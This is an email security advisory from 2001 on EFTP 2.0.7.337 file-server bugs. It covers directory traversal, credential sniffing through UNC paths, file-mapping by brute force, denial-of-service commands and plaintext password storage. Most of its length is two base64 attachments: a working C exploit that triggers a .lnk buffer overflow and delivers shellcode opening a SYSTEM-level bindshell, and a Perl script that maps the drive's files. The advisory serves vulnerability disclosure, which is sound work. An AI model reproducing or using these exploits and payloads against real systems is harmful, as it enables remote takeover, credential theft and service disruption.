Date: Wed, 12 Sep 2001 04:36:22 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]Subject: EFTP Version 2.0.7.337 vulnerabilities
--0-845075492-1000294582=:18140
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
EFTP Version 2.0.7.337 vulnerabilities
According to their site @ www.eftp.org
"EFTP is a 32bit combined Client/Server application,
basically 2 programs in one. EFTP incorporates the
448bit Blowfish Encryption Algorithm and the FTP
protocol (RFC 959 implementation) to provide secure
file transfers over TCP/IP based networks (The
Internet) providing strong encryption when the remote
and local hosts both use EFTP."
EFTP runs under Win9x/NT/2000/ME/XP.
The program has some bugs, and some of them
might lead to a full system compromise. I will try to
put an up-to-date version of this advisory online @
www.byterage.cjb.net
1) Revelation of drive contents & netbios password
hash retrieval via the LIST command
Example session (using the sample account):
USER SampleUser
PASS NothingSpectacular
LS ../*
LS c:/*
LS /c:/*.bat
LS a:/
...
This way we can browse through all resources available
to the machine.
We can also use UNC (universal naming convention)
pathnames (\\), meaning that we can force the FTP
Server to make an outbound Netbios connection to the
internet and sniff the credentials. Since the captured
credentials could then be decrypted using tools like
L0phtcrack, this could lead to a full system
compromise. This type of attack - and the solution -
has already been discussed by Rob Beck of @stake, Inc.
for G6 FTP Server at
http://www.atstake.com/research/advisories/2001/a040301-1.txt.
2) Revelation of drive contents via the SIZE and MDTM
commands
Example session:
QUOTE SIZE ../autoexec.bat
213 900
QUOTE MDTM ../autoexec.bat
213 20010901063342.000
So, both the SIZE & MDTM tell us that ../autoexec.bat
exists, in contrast to :
QUOTE SIZE ../notthere
550 Command failed: File not found.
QUOTE MDTM ../notthere
550 'c:\restricted\..\notthere':no such file or
directory
What's that? with the last command we can also obtain
the name of our homedirectory !
Indeed, but the homedirectory is also available
through a PWD command or a GET of a nonexistant file,
as the makers don't seem to make a problem of users
knowing their absolute homedirectory.
We can make use of the filelengths the SIZE commands
gives us to determine the exact windows OS version &
associated DLL versions, which might come in handy in
further (buffer overflow) attacks.
Since we can also use wildcards, we can 'bruteforce'
the filenames to map out the drive contents via SIZE
or MDTM commands. This type of attack has proven to
work on other FTP server software as well (GuildFTPd
<= v0.992), the proof of concept code (ftpsizemap.pl)
is attached to this mail.
3) Remotely exploitable buffer overflow / Denial of
Service attacks
Users with upload permissions can upload a *.lnk file
which contains :
("A" x 1744) . "CCCC"
Issuing an LS command will then cause the EIP to be
changed to 043434343h ("CCCC"), exploit code
(ex_eftp.c) which spawns a bindshell is attached to
this mail.
This buffer overflow could also lead to a DoS
attack...
Another Denial of Service can be caused by repeatedly
sending the command CWD A:, which queries the A:
drive. (but this could already be done via an LS A:\)
Another way to do a DoS could be sending a GET AUX.
which crashes win98 machines.
A GET /CON/CON is not filtered either... ==> crash on
unpatched win9x
And a PUT C:\PHEARME.TXT PRN.F00 makes nice printouts
on the remote machine ;) (if the printer is on, if
it's not on, the computer freezes until the printer is
turned on)
4) Plaintext password storage
The passwords are stored without encryption in the
\Program Files\eftp2\eftp2users.dat file. The risk is
obvious when combined with enough privileges to
remotely spawn a bindshell using the remote *.lnk
buffer overflow I demonstrated earlier.
VENDOR STATUS
I have notified the programmers, they responded that
they will release an update that fixes these bugs as
soon as possible.
GREETS & THANKS
all the #securax people, incubus, Zoa Chien, sentinel,
woody, AreS, r00t-dude, eXploitek, phr0zen, nsanity,
... the party animals :) Wouter H., Maarten V.H.,
Kristof D.(x2), Bart D.B., Cindy V.
[ByteRage] [email protected] www.byterage.cjb.net
__________________________________________________
Do You Yahoo!?
Get email alerts & NEW webcam video instant messaging with Yahoo! Messenger
http://im.yahoo.com
--0-845075492-1000294582=:18140
Content-Type: application/octet-stream; name="ex_eftpd.c"
Content-Transfer-Encoding: base64
Content-Description: ex_eftpd.c
Content-Disposition: attachment; filename="ex_eftpd.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKg0KICogRUZUUCBWZXJzaW9uIDIuMC43LjMz
NyByZW1vdGUgZXhwbG9pdCAgICAgICAgICAgICAgICAgICAgICAgKg0KICog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgKg0KICogY3JlYXRlIHNwbDBpdC5sbmsgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKg0KICogdXBs
b2FkIHRoZSBmaWxlIHVzaW5nIHRoZSBFRlRQIGNsaWVudCAgICAgICAgICAg
ICAgICAgICAgICAgKg0KICogKHNpbmNlIEknbSBub3QgcGxhbm5pbmcgdG8g
cmV3cml0ZSB0aGF0IGJsb3dmaXNoIGNyeXB0bykgICAgKg0KICogdGhlbiBp
c3N1ZSBhbiBMUyBjb21tYW5kIG9uIHRoZSBzZXJ2ZXIgICAgICAgICAgICAg
ICAgICAgICAgKg0KICogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKg0KICogaW1wYWN0OiBT
WVNURU0gbGV2ZWwgYWNjZXNzIENNRC5FWEUgc2hlbGwgb24gcG9ydCA2OTY4
ICAgICAgKg0KICogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgKg0KICogW0J5dGVSYWdlXSA8
Ynl0ZXJhZ2VAeWFob28uY29tPiBodHRwOi8vd3d3LmJ5dGVyYWdlLmNqYi5u
ZXQgKg0KICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKi8NCg0KI2luY2x1ZGUgPHN0ZGlv
Lmg+DQoNCiNkZWZpbmUgRmlsZU5hbWUgInNwbDBpdC5sbmsiDQoNCi8qIFlv
dSBzaG91bGQgc2V0IHRoZSBmb2xsb3dpbmcgdGhyZWUgY29uc3RzIGFjY29y
ZGluZw0KICogdG8gdGhlIERMTCB5b3UgYXJlIGJhc2luZyB0aGUgZXhwbG9p
dCB1cG9uLCBleGFtcGxlcyA6DQogKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqDQogKiBETEwgTmFtZSAgICA6IE1TVkNS
VC5ETEwNCiAqIFZlcnNpb24gICAgIDogdjYuMDAuODc5Ny4wMDAwDQogKiBG
aWxlIExlbmd0aCA6IDI3ODU4MSBieXRlcw0KICogbmV3RUlQID0gICAgICAg
ICAgICAgIlx4MUNceERGXHgwMVx4NzgiICgqKQ0KICogTG9hZExpYnJhcnlS
ZWYgICAgICAgIlx4RDRceDEwXHgwM1x4NzgiDQogKiBHZXRQcm9jQWRkcmVz
c1JlZkFERCAiXHhGQyINCiAqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioNCiAqIERMTCBOYW1lICAgIDogTVNWQ1JULkRM
TA0KICogVmVyc2lvbiAgICAgOiB2Ni4wMC44Mzk3LjAwMDANCiAqIEZpbGUg
TGVuZ3RoIDogMjY2MjkzIGJ5dGVzDQogKiBuZXdFSVAgPSAgICAgICAgICAg
ICAiXHg1NVx4RTRceDAxXHg3OCIgKCopDQogKiBMb2FkTGlicmFyeVJlZiAg
ICAgICAiXHhENFx4RTBceDAyXHg3OCINCiAqIEdldFByb2NBZGRyZXNzUmVm
QUREICJceEZDIg0KICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKg0KICogKCopIHRoZSBuZXcgRUlQIG11c3QgQ0FMTC9K
TVAvLi4uIGVpdGhlcg0KICogICAgIEVBWCBvciBFQlgNCiAqLw0KY29uc3Qg
Y2hhciAqIG5ld0VJUCA9ICAgICAgICAiXHg1NVx4RTRceDAxXHg3OCI7DQoj
ZGVmaW5lIExvYWRMaWJyYXJ5UmVmICAgICAgICJceEQ0XHhFMFx4MDJceDc4
Ig0KI2RlZmluZSBHZXRQcm9jQWRkcmVzc1JlZkFERCAiXHhGQyINCg0KLyog
VGhlIGZvbGxvd2luZyA0NTJiIHNoZWxsY29kZQ0KICogc3Bhd25zIGEgY21k
LmV4ZSBzaGVsbCBvbiBwb3J0IDY5NjgNCiAqIGFuZCBpcyBhIHBlcnNvbmFs
IHJld3JpdGUgb2YNCiAqIGRhcmsgc3B5cml0J3Mgb3JpZ2luYWwgY29kZQ0K
ICovDQoNCi8qID09PT0gU0hFTExDMERFIFNUQVJUID09PT0gKi8NCg0KY29u
c3QgY2hhciBzaGVsbGMwZGVbXSA9ICANCg0KLyogQ09ERTogKi8NCiJceDhi
XHhmMFx4YWNceDg0XHhjMFx4NzVceGZiXHg4Ylx4ZmVceDMzXHhjOVx4YjFc
eGMxXHg0ZVx4ODBceDM2Ig0KIlx4OTlceGUyXHhmYVx4YmIiTG9hZExpYnJh
cnlSZWYiXHg1Nlx4ZmZceDEzXHg5NVx4YWNceDg0XHhjMFx4NzUiDQoiXHhm
Ylx4NTZceDU1XHhmZlx4NTMiR2V0UHJvY0FkZHJlc3NSZWZBREQiXHhhYlx4
YWNceDg0XHhjMFx4NzVceGZiXHhhY1x4M2NceDIxXHg3NCINCiJceGU3XHg3
Mlx4MDNceDRlXHhlYlx4ZWJceDMzXHhlZFx4NTVceDZhXHgwMVx4NmFceDAy
XHhmZlx4NTdceGU4Ig0KIlx4OTNceDZhXHgxMFx4NTZceDUzXHhmZlx4NTdc
eGVjXHg2YVx4MDJceDUzXHhmZlx4NTdceGYwXHgzM1x4YzAiDQoiXHg1N1x4
NTBceGIwXHgwY1x4YWJceDU4XHhhYlx4NDBceGFiXHg1Zlx4NTVceDU3XHg1
Nlx4YWRceDU2XHhmZiINCiJceDU3XHhjMFx4NTVceDU3XHhhZFx4NTZceGFk
XHg1Nlx4ZmZceDU3XHhjMFx4YjBceDQ0XHg4OVx4MDdceDU3Ig0KIlx4ZmZc
eDU3XHhjNFx4OGJceDQ2XHhmNFx4ODlceDQ3XHgzY1x4ODlceDQ3XHg0MFx4
YWRceDg5XHg0N1x4MzgiDQoiXHgzM1x4QzBceDg5XHg0N1x4MzBceDY2XHhi
OFx4MDFceDAxXHg4OVx4NDdceDJjXHg1N1x4NTdceDU1XHg1NSINCiJceDU1
XHg2YVx4MDFceDU1XHg1NVx4NTZceDU1XHhmZlx4NTdceGM4XHhmZlx4NzZc
eGYwXHhmZlx4NTdceGNjIg0KIlx4ZmZceDc2XHhmY1x4ZmZceDU3XHhjY1x4
NTVceDU1XHg1M1x4ZmZceDU3XHhmNFx4OTNceDMzXHhjMFx4YjQiDQoiXHgw
NFx4NTBceDZhXHg0MFx4ZmZceDU3XHhkNFx4OTZceDZhXHg1MFx4ZmZceDU3
XHhlMFx4OGJceGNkXHhiNSINCiJceDA0XHg1NVx4NTVceDU3XHg1MVx4NTZc
eGZmXHg3N1x4YWZceGZmXHg1N1x4ZDBceDhiXHgwZlx4ZTNceDE4Ig0KIlx4
NTVceDU3XHg1MVx4NTZceGZmXHg3N1x4YWZceGZmXHg1N1x4ZGNceDBiXHhj
MFx4NzRceDIxXHg1NVx4ZmYiDQoiXHgzN1x4NTZceDUzXHhmZlx4NTdceGY4
XHhlYlx4ZDBceDMzXHhjMFx4NTBceGI0XHgwNFx4NTBceDU2XHg1MyINCiJc
eGZmXHg1N1x4ZmNceDU1XHg1N1x4NTBceDU2XHhmZlx4NzdceGIzXHhmZlx4
NTdceGQ4XHhlYlx4YjlceGZmIg0KIlx4NTdceGU0Ig0KDQovKiBEQVRBOiAo
WE9SZWQgd2l0aCAwOTkpICovDQoiXHhkMlx4ZGNceGNiXHhkN1x4ZGNceGQ1
XHhhYVx4YWJceDk5XHhkYVx4ZWJceGZjXHhmOFx4ZWRceGZjXHhjOSINCiJc
eGYwXHhlOVx4ZmNceDk5XHhkZVx4ZmNceGVkXHhjYVx4ZWRceGY4XHhlYlx4
ZWRceGVjXHhlOVx4ZDBceGY3Ig0KIlx4ZmZceGY2XHhkOFx4OTlceGRhXHhl
Ylx4ZmNceGY4XHhlZFx4ZmNceGM5XHhlYlx4ZjZceGZhXHhmY1x4ZWEiDQoi
XHhlYVx4ZDhceDk5XHhkYVx4ZjVceGY2XHhlYVx4ZmNceGQxXHhmOFx4Zjdc
eGZkXHhmNVx4ZmNceDk5XHhjOSINCiJceGZjXHhmY1x4ZjJceGQ3XHhmOFx4
ZjRceGZjXHhmZFx4YzlceGYwXHhlOVx4ZmNceDk5XHhkZVx4ZjVceGY2Ig0K
Ilx4ZmJceGY4XHhmNVx4ZDhceGY1XHhmNVx4ZjZceGZhXHg5OVx4Y2VceGVi
XHhmMFx4ZWRceGZjXHhkZlx4ZjAiDQoiXHhmNVx4ZmNceDk5XHhjYlx4ZmNc
eGY4XHhmZFx4ZGZceGYwXHhmNVx4ZmNceDk5XHhjYVx4ZjVceGZjXHhmYyIN
CiJceGU5XHg5OVx4ZGNceGUxXHhmMFx4ZWRceGM5XHhlYlx4ZjZceGZhXHhm
Y1x4ZWFceGVhXHg5OVx4YjhceGNlIg0KIlx4Y2FceGQ2XHhkYVx4ZDJceGFh
XHhhYlx4OTlceGVhXHhmNlx4ZmFceGYyXHhmY1x4ZWRceDk5XHhmYlx4ZjAi
DQoiXHhmN1x4ZmRceDk5XHhmNVx4ZjBceGVhXHhlZFx4ZmNceGY3XHg5OVx4
ZjhceGZhXHhmYVx4ZmNceGU5XHhlZCINCiJceDk5XHhlYVx4ZmNceGY3XHhm
ZFx4OTlceGViXHhmY1x4ZmFceGVmXHg5OVx4OTlceDliXHg5OVx4ODJceGEx
Ig0KIlx4OTlceDk5XHg5OVx4OTlceDk5XHg5OVx4OTlceDk5XHg5OVx4OTlc
eDk5XHg5OVx4ZmFceGY0XHhmZFx4OTkiDQoNCiJceDAwIjsNCg0KLyogPT09
PSBTSEVMTEMwREUgRU5EUyA9PT09ICovDQoNCjsNCg0KaW50IGk7DQoNCkZJ
TEUgKmZpbGU7DQoNCmludCBtYWluICgpDQp7DQogIA0KICBwcmludGYoIkVG
VFAgVmVyc2lvbiAyLjAuNy4zMzcgcmVtb3RlIGV4cGxvaXQgYnkgW0J5dGVS
YWdlXVxuIik7DQoNCiAgZmlsZSA9IGZvcGVuKEZpbGVOYW1lLCAidytiIik7
DQogIGlmICghZmlsZSkgew0KICAgIHByaW50ZigiRVJST1IhIENvdWxkbid0
IG9wZW4gIkZpbGVOYW1lIiBmb3Igb3V0cHV0ICFcbiIpOw0KICAgIHJldHVy
biAxOw0KICB9DQogIA0KICBmb3IgKGk9MDsgaTwxNzQwOyBpKyspIHsgZndy
aXRlKCJceDkwIiwgMSwgMSwgZmlsZSk7IH0NCiAgZndyaXRlKCJceEVCXHgw
Nlx4OTBceDkwIiwgMSwgNCwgZmlsZSk7ICANCiAgZndyaXRlKG5ld0VJUCwg
MSwgNCwgZmlsZSk7IA0KICBmd3JpdGUoc2hlbGxjMGRlLCAxLCBzaXplb2Yo
c2hlbGxjMGRlKS0xLCBmaWxlKTsNCg0KICBmY2xvc2UoZmlsZSk7DQoNCiAg
cHJpbnRmKEZpbGVOYW1lIiBjcmVhdGVkISAoU2hlbGxjb2RlIGxlbmd0aDog
JWkgYnl0ZXMpXG4iLCBzaXplb2Yoc2hlbGxjMGRlKSk7DQogIHJldHVybiAw
Ow0KDQp9
--0-845075492-1000294582=:18140
Content-Type: application/x-perl; name="ftpsizemap.pl"
Content-Transfer-Encoding: base64
Content-Description: ftpsizemap.pl
Content-Disposition: attachment; filename="ftpsizemap.pl"
IyEvdXNyL2Jpbi9wZXJsDQojIGZ0cHNpemVtYXAucGwgLSBtYXBzIHRoZSBk
cml2ZSBjb250ZW50cyB1c2luZyB0aGUgU0laRS9NRFRNIGNvbW1hbmRzIHdp
dGggd2lsZGNhcmRzDQojDQojIFN5bnRheDogcGVybCBmdHBzaXplbWFwLnBs
IDxob3N0PiA8cG9ydD4gPHVzZXI+IDxwYXNzPiA+ZmlsZXMubG9nDQojDQoj
IHZ1bG5lcmFibGUgZnRwIHNlcnZlcnMgOiBFRlRQIHYyLjAuNy4zMzcsIEd1
aWxkRlRQZCB2MC45OTINCiMgYnkgW0J5dGVSYWdlXSA8Ynl0ZXJhZ2VAeWFo
b28uY29tPiBodHRwOi8vd3d3LmJ5dGVyYWdlLmNqYi5uZXQNCg0KdXNlIElP
OjpTb2NrZXQ7DQoNCiRjbWQgPSAiU0laRSI7DQoNCkBjaGFycyA9ICgnQScs
J0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywn
TScsDQogICAgICAgICAgJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdV
JywnVicsJ1cnLCdYJywnWScsJ1onLA0KICAgICAgICAgICcwJywnMScsJzIn
LCczJywnNCcsJzUnLCc2JywnNycsJzgnLCc5JywnLicpOw0KDQppZiAoISgk
aG9zdCA9ICRBUkdWWzBdKSkgeyAkaG9zdCA9ICIxMjcuMC4wLjEiOyB9IHBy
aW50ICJMb2dnaW5nIG9uIEAgJGhvc3Q6IjsgDQppZiAoISgkcG9ydCA9ICRB
UkdWWzFdKSkgeyAkcG9ydCA9ICIyMSI7IH0gcHJpbnQgIiRwb3J0IGFzIHVz
ZXIgIjsgDQppZiAoISgkbG9naW5pZCA9ICRBUkdWWzJdKSkgeyAkbG9naW5p
ZCA9ICJhbm9ueW1vdXMiOyB9IHByaW50ICIke2xvZ2luaWR9OiI7IA0KaWYg
KCEoJGxvZ2lucHdkID0gJEFSR1ZbM10pKSB7ICRsb2dpbnB3ZCA9ICJhbm9u
eW1vdXMiOyB9IHByaW50ICIke2xvZ2lucHdkfVxuIjsgDQoNCiRzb2NrID0g
SU86OlNvY2tldDo6SU5FVC0+bmV3KFByb3RvPT4idGNwIiwgUGVlckFkZHI9
PiRob3N0LCBQZWVyUG9ydD0+JHBvcnQpIHx8IGRpZSAiQ291bGRuJ3QgY3Jl
YXRlIHNvY2tldCAhIjsgJHNvY2stPmF1dG9mbHVzaCgpOw0KDQpwcmludCAi
XG5Mb2dnaW5nIGluLi4uXG4iOw0KJHJlcGx5ID0gPCRzb2NrPjsNCnByaW50
ICRyZXBseTsgcHJpbnQgIlVTRVIgJHtsb2dpbmlkfVwwMTVcMDEyIjsNCnBy
aW50ICRzb2NrICJVU0VSICR7bG9naW5pZH1cMDE1XDAxMiI7DQokcmVwbHkg
PSA8JHNvY2s+OyBwcmludCAkcmVwbHk7DQpwcmludCAiUEFTUyAke2xvZ2lu
cHdkfVwwMTVcMDEyIjsNCnByaW50ICRzb2NrICJQQVNTICR7bG9naW5wd2R9
XDAxNVwwMTIiOw0KZG8gew0KICAkcmVwbHkgPSA8JHNvY2s+OyBwcmludCAi
JHJlcGx5IjsNCn0gd2hpbGUgJHJlcGx5ICF+IC8yMzBccy87DQoNCnByaW50
ICJcbkRldGVybWluaW5nIHJvb3QgZGlyZWN0b3J5Li4uXG4iOw0KJGxldmVs
ID0gMDsNCiRyb290ZGlyID0gIiI7DQpkbyB7DQogIHByaW50ICRzb2NrICIk
Y21kICR7cm9vdGRpcn0qXDAxNVwwMTIiOw0KICAkcmVwbHkgPSA8JHNvY2s+
OyBwcmludCAkcmVwbHk7DQogIHByaW50ICRzb2NrICIkY21kICR7cm9vdGRp
cn0uLi8qXDAxNVwwMTIiOw0KICAkcmVwbHkyID0gPCRzb2NrPjsgcHJpbnQg
JHJlcGx5MjsNCiAgaWYgICghKCRyZXBseSBlcSAkcmVwbHkyKSkgeyAkcm9v
dGRpciAuPSAiLi4vIjsgJGxldmVsKys7IH0NCn0gd2hpbGUgKCEoJHJlcGx5
IGVxICRyZXBseTIpKTsNCnByaW50ICJUaGUgaGFyZGRyaXZlJ3Mgcm9vdCBk
aXJlY3RvcnkgaXMgYXBwYXJlbnRseSAke2xldmVsfSBkaXJlY3RvcmllcyB1
cFxuQ29ycmVjdCBtYW51YWxseSBpZiB5b3Ugd2FudCB0byBtYXAgYW5vdGhl
ciBkaXJlY3RvcnkuXG4iOw0KDQpwcmludCAiXG5NYXBwaW5nIGRpcmVjdG9y
eS4uLlxuIjsNCiRsYXN0Y2hhciA9ICRjaGFyc1soJCNjaGFycyldOw0KJHtm
aWxlfSA9ICIiOw0KZG8gew0KICBwcmludCAkc29jayAiJGNtZCAke3Jvb3Rk
aXJ9JHtmaWxlfT9cMDE1XDAxMiI7DQogICRyZXBseSA9IDwkc29jaz47DQog
IGlmICgkcmVwbHkgPX4gLzIxM1xzLykgew0KICAgIGZvciAoJGluZCA9IDA7
ICRpbmQ8KEBjaGFycyk7ICRpbmQrKykgew0KICAgICAgcHJpbnQgJHNvY2sg
IiRjbWQgJHtyb290ZGlyfSR7ZmlsZX0kY2hhcnNbJGluZF1cMDE1XDAxMiI7
IA0KICAgICAgJHJlcGx5ID0gPCRzb2NrPjsNCiAgICAgIGlmICgkcmVwbHkg
PX4gLzIxM1xzLykgew0KICAgICAgICBwcmludCAiJHtyb290ZGlyfSR7Zmls
ZX0kY2hhcnNbJGluZF1cbiI7DQogICAgICB9DQogICAgfQ0KICAgICRmaWxl
IC49ICRjaGFyc1swXTsNCiAgfSBlbHNlIHsNCiAgICBkbyB7DQogICAgICBw
cmludCAkc29jayAiJGNtZCAke3Jvb3RkaXJ9JHtmaWxlfSpcMDE1XDAxMiI7
DQogICAgICAkcmVwbHkgPSA8JHNvY2s+Ow0KICAgICAgaWYgKCRyZXBseSA9
fiAvMjEzXHMvKSB7DQogICAgICAgIHByaW50ICRzb2NrICIkY21kICR7cm9v
dGRpcn0ke2ZpbGV9XDAxNVwwMTIiOw0KICAgICAgICAkcmVwbHkgPSA8JHNv
Y2s+Ow0KICAgICAgICBpZiAoJHJlcGx5ICF+IC8yMTNccy8pIHsNCiAgICAg
ICAgICAkZmlsZSAuPSAkY2hhcnNbMF07DQogICAgICAgIH0gZWxzZSB7DQog
ICAgICAgICAgZG8gew0KICAgICAgICAgICAgaWYgKGxlbmd0aCgkZmlsZSkg
PiAwKSB7DQogICAgICAgICAgICAgICRsYXN0YyA9IGNob3AoJGZpbGUpOw0K
ICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgYnJlYWs7DQog
ICAgICAgICAgICB9DQogICAgICAgICAgfSB3aGlsZSAoJGxhc3RjIGVxICRs
YXN0Y2hhcik7DQogICAgICAgICAgaWYgKGxlbmd0aCgkbGFzdGMpID09IDEp
IHsNCiAgICAgICAgICAgIGZvciAoJGluZCA9IDA7ICRpbmQ8JCNjaGFyczsg
JGluZCsrKSB7DQogICAgICAgICAgICAgIGlmICgkbGFzdGMgZXEgJGNoYXJz
WyRpbmRdKSB7ICRmaWxlIC49ICRjaGFyc1skaW5kKzFdOyBicmVhazsgfQ0K
ICAgICAgICAgICAgfQ0KICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAg
fSBlbHNlIHsNCiAgICAgICAgZG8gew0KICAgICAgICAgIGlmIChsZW5ndGgo
JGZpbGUpID4gMCkgew0KICAgICAgICAgICAgJGxhc3RjID0gY2hvcCgkZmls
ZSk7DQogICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgIGJyZWFrOw0K
ICAgICAgICAgIH0NCiAgICAgICAgfSB3aGlsZSAoJGxhc3RjIGVxICRsYXN0
Y2hhcik7DQogICAgICAgIGlmIChsZW5ndGgoJGxhc3RjKSA9PSAxKSB7DQog
ICAgICAgICAgZm9yICgkaW5kID0gMDsgJGluZDwkI2NoYXJzOyAkaW5kKysp
IHsNCiAgICAgICAgICAgIGlmICgkbGFzdGMgZXEgJGNoYXJzWyRpbmRdKSB7
ICRmaWxlIC49ICRjaGFyc1skaW5kKzFdOyBicmVhazsgfQ0KICAgICAgICAg
IH0NCiAgICAgICAgfQ0KICAgICAgfQ0KICAgIH0gd2hpbGUgKCRyZXBseSA9
fiAvMjEzXHMvKTsNCiAgfQ0KfSB3aGlsZSAhKCRmaWxlIGVxICIiKTsNCg0K
Y2xvc2UoJHNvY2spOw0KDQpleGl0Ow0K
--0-845075492-1000294582=:18140--
